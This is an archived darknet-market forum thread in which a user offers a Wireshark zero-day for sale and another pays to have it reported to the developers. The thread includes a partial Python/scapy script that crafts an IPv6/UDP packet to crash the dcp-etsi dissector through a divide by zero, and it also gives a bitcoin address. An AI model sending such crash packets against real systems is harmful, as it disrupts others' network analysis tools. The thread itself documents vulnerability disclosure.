Silk Road forums
Market => Product offers => Topic started by: markjenkins on August 04, 2012, 02:58 am
-
I have a 0day for wireshark. Would there be any interest for it here?
-
No, probably not. Anything meant to harm or defraud others is against the rules.
Would you be willing to submit it to the wireshark devs if I chipped 0.10 btc at you?
-
Yes I would.
-
The full code has been sent to security@wireshark.org
Bitcoin 15oaSCmzQ2jDXsNG5KKeeLyJzFcbsuatnq
#!/usr/bin/python
#divide by zero in dcp-etsi.c wireshark dissector
from scapy.all import *
from sys import *
crashdata='504623c40000000088############'.decode('hex')
if len(argv)<2:
    packet=Ether()/IPv6(dst="::1")/UDP(dport=55935,sport=42404)/crashdata
    wrpcap('lol.pcap',[packet])
    print "open lol.pcap"
else:
    packet=IPv6####################
    send(packet)
-
I'm assuming that is just a part of the full code, yes? Either way... your coins are on their way.
Because I'm sure it's foolish... but I'm choosing to trust you.
-
You'll need the scapy python library for that script to work.
Found the original article here: http://isisblogs.poly.edu/2012/08/03/tracing-bugs-in-wireshark/
-
Why would you pay for a zero-day when the exploit has already been sent to the provider?
-
Why would you pay for a zero-day when the exploit has already been sent to the provider?
I paid to have it sent to the provider. :)
-
Why would you pay for a zero-day when the exploit has already been sent to the provider?
I paid to have it sent to the provider. :)
Good show white hat! +1 for you :)
-
Why would you pay for a zero-day when the exploit has already been sent to the provider?
I paid to have it sent to the provider. :)
+1, good on you mate.
-
+1 to BR and to OP too. Well, I'm almost to 100 posts.
-
Ahh...I swear we have the most unexpected things happening on SR. ;)
-
Oh c'mon! just reveal the entire payload! :D
By the way, how did you find it? I've always wanted to know how people discover it.
I have a bit of experience creating cracks and keygens but I never understood how people find ways to overflow the buffer and write to the executable space.
Can you enlighten me?